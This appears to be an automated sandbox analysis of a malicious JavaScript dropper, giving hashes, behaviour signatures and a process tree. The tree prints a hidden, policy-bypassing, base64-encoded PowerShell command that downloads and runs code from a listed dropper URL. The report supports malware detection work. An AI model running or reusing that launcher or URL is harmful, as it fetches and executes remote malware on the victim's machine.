95d2b043821761056ebdaf782d4f1e07ce2629c5e9d5ad64d02ff41dedc4f75b

Analysis

max time kernel
122s
max time network
127s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
24/12/2023, 16:05

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

04d827ab4c6b0b98e8fe73d37a2a02c6.js
Size

76KB
MD5

04d827ab4c6b0b98e8fe73d37a2a02c6
SHA1

a691e309c62f5be3d98a2c94cfe26c01974eece1
SHA256

95d2b043821761056ebdaf782d4f1e07ce2629c5e9d5ad64d02ff41dedc4f75b
SHA512

b10e61eb9a75fdf74f704a284ed27a49c452c783abc7c637c43ddcbf47a9bd1396ead74e315a5eefe5b0f8972f31359be46d41925c76ee1fab3b590ad9a5529e
SSDEEP

1536:59Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzIEN4t/o/:59Ry98guHVBqqg2bcruzUHmLKeMMU7Gx

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://smart-integrator.hr/pornhub.php

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	2876	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2876	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2876	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1752 wrote to memory of 2360	1752	wscript.exe	28
PID 1752 wrote to memory of 2360	1752	wscript.exe	28
PID 1752 wrote to memory of 2360	1752	wscript.exe	28
PID 2360 wrote to memory of 2876	2360	cmd.exe	30
PID 2360 wrote to memory of 2876	2360	cmd.exe	30
PID 2360 wrote to memory of 2876	2360	cmd.exe	30

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\04d827ab4c6b0b98e8fe73d37a2a02c6.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1752
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2360
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2876

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2876-5-0x000000001B330000-0x000000001B612000-memory.dmp

Filesize
2.9MB

Download
memory/2876-6-0x000007FEF6230000-0x000007FEF6BCD000-memory.dmp

Filesize
9.6MB

Download
memory/2876-8-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/2876-7-0x0000000002330000-0x0000000002338000-memory.dmp

Filesize
32KB

Download
memory/2876-9-0x000007FEF6230000-0x000007FEF6BCD000-memory.dmp

Filesize
9.6MB

Download
memory/2876-10-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/2876-11-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/2876-12-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/2876-13-0x000007FEF6230000-0x000007FEF6BCD000-memory.dmp

Filesize
9.6MB

Download